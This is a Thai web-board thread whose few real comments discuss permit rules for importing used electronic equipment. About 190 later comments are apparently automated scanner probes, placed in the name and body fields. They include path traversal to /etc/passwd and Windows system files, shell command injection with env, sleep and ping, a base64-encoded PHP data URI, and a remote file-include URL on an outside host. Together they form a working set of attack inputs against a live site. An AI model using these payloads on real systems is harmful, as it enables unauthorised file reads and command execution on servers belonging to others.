ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 10:30:47 น.
 
ความคิดเห็นที่ 197
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:46 น.
 
ความคิดเห็นที่ 196
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/ser วันที่ : 09 ส.ค. 64 10:30:46 น.
 
ความคิดเห็นที่ 195
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:46 น.
 
ความคิดเห็นที่ 194
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:45 น.
 
ความคิดเห็นที่ 193
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:45 น.
 
ความคิดเห็นที่ 192
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:45 น.
 
ความคิดเห็นที่ 191
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:44 น.
 
ความคิดเห็นที่ 190
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:44 น.
 
ความคิดเห็นที่ 189
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:44 น.
 
ความคิดเห็นที่ 188
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:43 น.
 
ความคิดเห็นที่ 187
Hi there!
 
ผู้ตั้ง : default/../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:42 น.
 
ความคิดเห็นที่ 186
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:42 น.
 
ความคิดเห็นที่ 185
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:42 น.
 
ความคิดเห็นที่ 184
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:41 น.
 
ความคิดเห็นที่ 183
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:41 น.
 
ความคิดเห็นที่ 182
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:41 น.
 
ความคิดเห็นที่ 181
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:41 น.
 
ความคิดเห็นที่ 180
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:40 น.
 
ความคิดเห็นที่ 179
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/services วันที่ : 09 ส.ค. 64 10:30:40 น.
 
ความคิดเห็นที่ 178
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:40 น.
 
ความคิดเห็นที่ 177
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:39 น.
 
ความคิดเห็นที่ 176
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:39 น.
 
ความคิดเห็นที่ 175
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../etc/passwd วันที่ : 09 ส.ค. 64 10:30:39 น.
 
ความคิดเห็นที่ 174
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../windows/ วันที่ : 09 ส.ค. 64 10:30:39 น.
 
ความคิดเห็นที่ 173
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../lib/ วันที่ : 09 ส.ค. 64 10:30:38 น.
 
ความคิดเห็นที่ 172
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services::$DATA วันที่ : 09 ส.ค. 64 10:30:38 น.
 
ความคิดเห็นที่ 171
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:38 น.
 
ความคิดเห็นที่ 170
Hi there!
 
ผู้ตั้ง : C:/Windows/System32/drivers/etc/services วันที่ : 09 ส.ค. 64 10:30:37 น.
 
ความคิดเห็นที่ 169
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices::$DATA วันที่ : 09 ส.ค. 64 10:30:37 น.
 
ความคิดเห็นที่ 168
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 10:30:36 น.
 
ความคิดเห็นที่ 167
Hi there!
 
ผู้ตั้ง : C:WindowsSystem32driversetcservices วันที่ : 09 ส.ค. 64 10:30:36 น.
 
ความคิดเห็นที่ 166
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 10:30:35 น.
 
ความคิดเห็นที่ 165
Hi there!
 
ผู้ตั้ง : /etc/services วันที่ : 09 ส.ค. 64 10:30:35 น.
 
ความคิดเห็นที่ 164
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 10:30:35 น.
 
ความคิดเห็นที่ 163
Hi there!
 
ผู้ตั้ง : /etc/passwd วันที่ : 09 ส.ค. 64 10:30:34 น.
 
ความคิดเห็นที่ 162
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 10:30:34 น.
 
ความคิดเห็นที่ 161
Hi there!
 
ผู้ตั้ง : https://wapiti3.ovh/e.php วันที่ : 09 ส.ค. 64 10:30:33 น.
 
ความคิดเห็นที่ 160
&ping -n 25 127.0.0.1&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:18 น.
 
ความคิดเห็นที่ 159
a|sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:18 น.
 
ความคิดเห็นที่ 158
a;sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:17 น.
 
ความคิดเห็นที่ 157
a`sleep 60`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:17 น.
 
ความคิดเห็นที่ 156
a`)`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:17 น.
 
ความคิดเห็นที่ 155
data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:16 น.
 
ความคิดเห็นที่ 154
/e
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:12 น.
 
ความคิดเห็นที่ 153
env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:12 น.
 
ความคิดเห็นที่ 152
set
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:12 น.
 
ความคิดเห็นที่ 151
&set&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:11 น.
 
ความคิดเห็นที่ 150
Hi there!
env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:11 น.
 
ความคิดเห็นที่ 149
Hi there!;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:11 น.
 
ความคิดเห็นที่ 148
../../../../../../../../../../../../../../../usr/bin/env|
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:10 น.
 
ความคิดเห็นที่ 147
a);env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:10 น.
 
ความคิดเห็นที่ 146
a;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:10 น.
 
ความคิดเห็นที่ 145
|env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:09 น.
 
ความคิดเห็นที่ 144
;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:09 น.
 
ความคิดเห็นที่ 143
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:08 น.
 
ความคิดเห็นที่ 142
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:08 น.
 
ความคิดเห็นที่ 141
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:07 น.
 
ความคิดเห็นที่ 140
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:06 น.
 
ความคิดเห็นที่ 139
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:06 น.
 
ความคิดเห็นที่ 138
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:06 น.
 
ความคิดเห็นที่ 137
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:05 น.
 
ความคิดเห็นที่ 136
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:05 น.
 
ความคิดเห็นที่ 135
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:05 น.
 
ความคิดเห็นที่ 134
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:05 น.
 
ความคิดเห็นที่ 133
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:04 น.
 
ความคิดเห็นที่ 132
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:04 น.
 
ความคิดเห็นที่ 131
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:04 น.
 
ความคิดเห็นที่ 130
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:03 น.
 
ความคิดเห็นที่ 129
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:02 น.
 
ความคิดเห็นที่ 128
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:02 น.
 
ความคิดเห็นที่ 127
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:01 น.
 
ความคิดเห็นที่ 126
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:01 น.
 
ความคิดเห็นที่ 125
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:00 น.
 
ความคิดเห็นที่ 124
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:00 น.
 
ความคิดเห็นที่ 123
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:00 น.
 
ความคิดเห็นที่ 122
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:30:00 น.
 
ความคิดเห็นที่ 121
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:59 น.
 
ความคิดเห็นที่ 120
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:59 น.
 
ความคิดเห็นที่ 119
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:59 น.
 
ความคิดเห็นที่ 118
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:59 น.
 
ความคิดเห็นที่ 117
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:58 น.
 
ความคิดเห็นที่ 116
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:58 น.
 
ความคิดเห็นที่ 115
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:57 น.
 
ความคิดเห็นที่ 114
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:57 น.
 
ความคิดเห็นที่ 113
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:57 น.
 
ความคิดเห็นที่ 112
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:56 น.
 
ความคิดเห็นที่ 111
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:56 น.
 
ความคิดเห็นที่ 110
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:56 น.
 
ความคิดเห็นที่ 109
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:55 น.
 
ความคิดเห็นที่ 108
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:55 น.
 
ความคิดเห็นที่ 107
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:55 น.
 
ความคิดเห็นที่ 106
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:54 น.
 
ความคิดเห็นที่ 105
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:54 น.
 
ความคิดเห็นที่ 104
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:53 น.
 
ความคิดเห็นที่ 103
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:53 น.
 
ความคิดเห็นที่ 102
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:53 น.
 
ความคิดเห็นที่ 101
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:53 น.
 
ความคิดเห็นที่ 100
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:52 น.
 
ความคิดเห็นที่ 99
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:52 น.
 
ความคิดเห็นที่ 98
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:51 น.
 
ความคิดเห็นที่ 97
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:50 น.
 
ความคิดเห็นที่ 96
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:50 น.
 
ความคิดเห็นที่ 95
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:49 น.
 
ความคิดเห็นที่ 94
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:49 น.
 
ความคิดเห็นที่ 93
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:48 น.
 
ความคิดเห็นที่ 92
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:48 น.
 
ความคิดเห็นที่ 91
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:48 น.
 
ความคิดเห็นที่ 90
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:48 น.
 
ความคิดเห็นที่ 89
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:47 น.
 
ความคิดเห็นที่ 88
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:47 น.
 
ความคิดเห็นที่ 87
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:46 น.
 
ความคิดเห็นที่ 86
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 06:29:46 น.
 
ความคิดเห็นที่ 85
Hi there!
 
ผู้ตั้ง : &ping -n 25 127.0.0.1& วันที่ : 09 ส.ค. 64 06:29:46 น.
 
ความคิดเห็นที่ 84
Hi there!
 
ผู้ตั้ง : a|sleep 60; วันที่ : 09 ส.ค. 64 06:29:45 น.
 
ความคิดเห็นที่ 83
Hi there!
 
ผู้ตั้ง : a;sleep 60; วันที่ : 09 ส.ค. 64 06:29:45 น.
 
ความคิดเห็นที่ 82
Hi there!
 
ผู้ตั้ง : a`sleep 60` วันที่ : 09 ส.ค. 64 06:29:44 น.
 
ความคิดเห็นที่ 81
Hi there!
 
ผู้ตั้ง : a`)` วันที่ : 09 ส.ค. 64 06:29:44 น.
 
ความคิดเห็นที่ 80
Hi there!
 
ผู้ตั้ง : data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg== วันที่ : 09 ส.ค. 64 06:29:44 น.
 
ความคิดเห็นที่ 79
Hi there!
 
ผู้ตั้ง : /e วันที่ : 09 ส.ค. 64 06:29:39 น.
 
ความคิดเห็นที่ 78
Hi there!
 
ผู้ตั้ง : env วันที่ : 09 ส.ค. 64 06:29:39 น.
 
ความคิดเห็นที่ 77
Hi there!
 
ผู้ตั้ง : set วันที่ : 09 ส.ค. 64 06:29:38 น.
 
ความคิดเห็นที่ 76
Hi there!
 
ผู้ตั้ง : &set& วันที่ : 09 ส.ค. 64 06:29:38 น.
 
ความคิดเห็นที่ 75
Hi there!
 
ผู้ตั้ง : default env; วันที่ : 09 ส.ค. 64 06:29:38 น.
 
ความคิดเห็นที่ 74
Hi there!
 
ผู้ตั้ง : default;env; วันที่ : 09 ส.ค. 64 06:29:37 น.
 
ความคิดเห็นที่ 73
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../usr/bin/env| วันที่ : 09 ส.ค. 64 06:29:37 น.
 
ความคิดเห็นที่ 72
Hi there!
 
ผู้ตั้ง : a);env; วันที่ : 09 ส.ค. 64 06:29:36 น.
 
ความคิดเห็นที่ 71
Hi there!
 
ผู้ตั้ง : a;env; วันที่ : 09 ส.ค. 64 06:29:36 น.
 
ความคิดเห็นที่ 70
Hi there!
 
ผู้ตั้ง : |env วันที่ : 09 ส.ค. 64 06:29:36 น.
 
ความคิดเห็นที่ 69
Hi there!
 
ผู้ตั้ง : ;env; วันที่ : 09 ส.ค. 64 06:29:35 น.
 
ความคิดเห็นที่ 68
&ping -n 25 127.0.0.1&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:56 น.
 
ความคิดเห็นที่ 67
a|sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:56 น.
 
ความคิดเห็นที่ 66
a;sleep 60;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:56 น.
 
ความคิดเห็นที่ 65
a`sleep 60`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:56 น.
 
ความคิดเห็นที่ 64
a`)`
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:55 น.
 
ความคิดเห็นที่ 63
data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg==
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:55 น.
 
ความคิดเห็นที่ 62
/e
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:51 น.
 
ความคิดเห็นที่ 61
env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:51 น.
 
ความคิดเห็นที่ 60
set
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:51 น.
 
ความคิดเห็นที่ 59
&set&
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:50 น.
 
ความคิดเห็นที่ 58
Hi there!
env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:50 น.
 
ความคิดเห็นที่ 57
Hi there!;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:49 น.
 
ความคิดเห็นที่ 56
../../../../../../../../../../../../../../../usr/bin/env|
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:49 น.
 
ความคิดเห็นที่ 55
a);env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:49 น.
 
ความคิดเห็นที่ 54
a;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:49 น.
 
ความคิดเห็นที่ 53
|env
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:48 น.
 
ความคิดเห็นที่ 52
;env;
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:47 น.
 
ความคิดเห็นที่ 51
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:47 น.
 
ความคิดเห็นที่ 50
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:46 น.
 
ความคิดเห็นที่ 49
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:46 น.
 
ความคิดเห็นที่ 48
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:46 น.
 
ความคิดเห็นที่ 47
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:45 น.
 
ความคิดเห็นที่ 46
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:45 น.
 
ความคิดเห็นที่ 45
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:45 น.
 
ความคิดเห็นที่ 44
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:45 น.
 
ความคิดเห็นที่ 43
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:44 น.
 
ความคิดเห็นที่ 42
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:44 น.
 
ความคิดเห็นที่ 41
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:44 น.
 
ความคิดเห็นที่ 40
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:44 น.
 
ความคิดเห็นที่ 39
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:43 น.
 
ความคิดเห็นที่ 38
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:43 น.
 
ความคิดเห็นที่ 37
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:43 น.
 
ความคิดเห็นที่ 36
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:43 น.
 
ความคิดเห็นที่ 35
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:42 น.
 
ความคิดเห็นที่ 34
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:42 น.
 
ความคิดเห็นที่ 33
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:42 น.
 
ความคิดเห็นที่ 32
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:41 น.
 
ความคิดเห็นที่ 31
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:41 น.
 
ความคิดเห็นที่ 30
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:41 น.
 
ความคิดเห็นที่ 29
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:40 น.
 
ความคิดเห็นที่ 28
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:40 น.
 
ความคิดเห็นที่ 27
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:40 น.
 
ความคิดเห็นที่ 26
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:40 น.
 
ความคิดเห็นที่ 25
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:39 น.
 
ความคิดเห็นที่ 24
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:39 น.
 
ความคิดเห็นที่ 23
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 05:57:39 น.
 
ความคิดเห็นที่ 22
Hi there!
 
ผู้ตั้ง : &ping -n 25 127.0.0.1& วันที่ : 09 ส.ค. 64 05:57:39 น.
 
ความคิดเห็นที่ 21
Hi there!
 
ผู้ตั้ง : a|sleep 60; วันที่ : 09 ส.ค. 64 05:57:38 น.
 
ความคิดเห็นที่ 20
Hi there!
 
ผู้ตั้ง : a;sleep 60; วันที่ : 09 ส.ค. 64 05:57:38 น.
 
ความคิดเห็นที่ 19
Hi there!
 
ผู้ตั้ง : a`sleep 60` วันที่ : 09 ส.ค. 64 05:57:38 น.
 
ความคิดเห็นที่ 18
Hi there!
 
ผู้ตั้ง : a`)` วันที่ : 09 ส.ค. 64 05:57:38 น.
 
ความคิดเห็นที่ 17
Hi there!
 
ผู้ตั้ง : data:;base64,PD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA/Pg== วันที่ : 09 ส.ค. 64 05:57:37 น.
 
ความคิดเห็นที่ 16
Hi there!
 
ผู้ตั้ง : /e วันที่ : 09 ส.ค. 64 05:57:34 น.
 
ความคิดเห็นที่ 15
Hi there!
 
ผู้ตั้ง : env วันที่ : 09 ส.ค. 64 05:57:34 น.
 
ความคิดเห็นที่ 14
Hi there!
 
ผู้ตั้ง : set วันที่ : 09 ส.ค. 64 05:57:33 น.
 
ความคิดเห็นที่ 13
Hi there!
 
ผู้ตั้ง : &set& วันที่ : 09 ส.ค. 64 05:57:33 น.
 
ความคิดเห็นที่ 12
Hi there!
 
ผู้ตั้ง : default env; วันที่ : 09 ส.ค. 64 05:57:33 น.
 
ความคิดเห็นที่ 11
Hi there!
 
ผู้ตั้ง : default;env; วันที่ : 09 ส.ค. 64 05:57:33 น.
 
ความคิดเห็นที่ 10
Hi there!
 
ผู้ตั้ง : ../../../../../../../../../../../../../../../usr/bin/env| วันที่ : 09 ส.ค. 64 05:57:32 น.
 
ความคิดเห็นที่ 9
Hi there!
 
ผู้ตั้ง : a);env; วันที่ : 09 ส.ค. 64 05:57:32 น.
 
ความคิดเห็นที่ 8
Hi there!
 
ผู้ตั้ง : a;env; วันที่ : 09 ส.ค. 64 05:57:32 น.
 
ความคิดเห็นที่ 7
Hi there!
 
ผู้ตั้ง : |env วันที่ : 09 ส.ค. 64 05:57:31 น.
 
ความคิดเห็นที่ 6
Hi there!
 
ผู้ตั้ง : ;env; วันที่ : 09 ส.ค. 64 05:57:31 น.
 
ความคิดเห็นที่ 5
Hi there!
 
ผู้ตั้ง : default วันที่ : 09 ส.ค. 64 04:07:25 น.
 
ความคิดเห็นที่ 4
ถ้าบริษัทไม่ใช่ผู้ประกอบการที่มีการนำเข้าเครื่องใช้ไฟฟ้าและอุปกรณ์อิเล็คทรอนิกส์ที่ใช้แล้วเพื่อคัดแยกหรือแปรสภาพหรือเพื่อการอื่นใด ไม่ต้องดำเนินการใดๆ เพราะทางกรมโรงงานฯ จะให้ผู้นำเข้าต้องขออนุญาตตามประกาศกรมโรงงานอุตสาหกรรม เรื่อง เงื่อนไขในการอนุญาตให้นำเครื่องใช้ไฟฟ้า และอุปกรณ์อิเล็กทรอนิกส์ที่ใช้แล้ว ที่เป็นวัตถุอันตรายเข้ามาในราชอาณาจักร (ฉบับที่ 2) พ.ศ.2549 และประกาศกระทรวงอุตสาหกรรม เรื่อง เงื่อนไขในการอนุญาตให้นำเครื่องใช้ไฟฟ้าและอุปกรณ์อิเล็กทรอนิกส์ที่ใช้แล้วที่เป็นวัตถุอันตรายเข้ามาในราชอาณาจักร (ฉบับที่ 3) พ.ศ. 2550
 
ผู้ตั้ง : ปิยะชัย จันทรวงศ์ไพศาล วันที่ : 09 ต.ค. 56 06:31:24 น.
 
ความคิดเห็นที่ 3
ขอบคุณค่ะ

แล้วตาม บัญชี ๕.๓ เครื่องใช้ไฟฟ้าและอุปกรณ์อิเล็กทรอนิกส์ที่ใช้แล้ว

ต้องจัดการอะไรหรือไม่คะ
 
ผู้ตั้ง : wararat วันที่ : 08 ต.ค. 56 14:38:20 น.
 
ความคิดเห็นที่ 2
ขอบคุณค่ะ

แล้วตาม บัญชี ๕.๓ เครื่องใช้ไฟฟ้าและอุปกรณ์อิเล็กทรอนิกส์ที่ใช้แล้ว

ต้องจัดการอะไรหรือไม่คะ
 
ผู้ตั้ง : wararat วันที่ : 08 ต.ค. 56 13:49:56 น.
 
ความคิดเห็นที่ 1
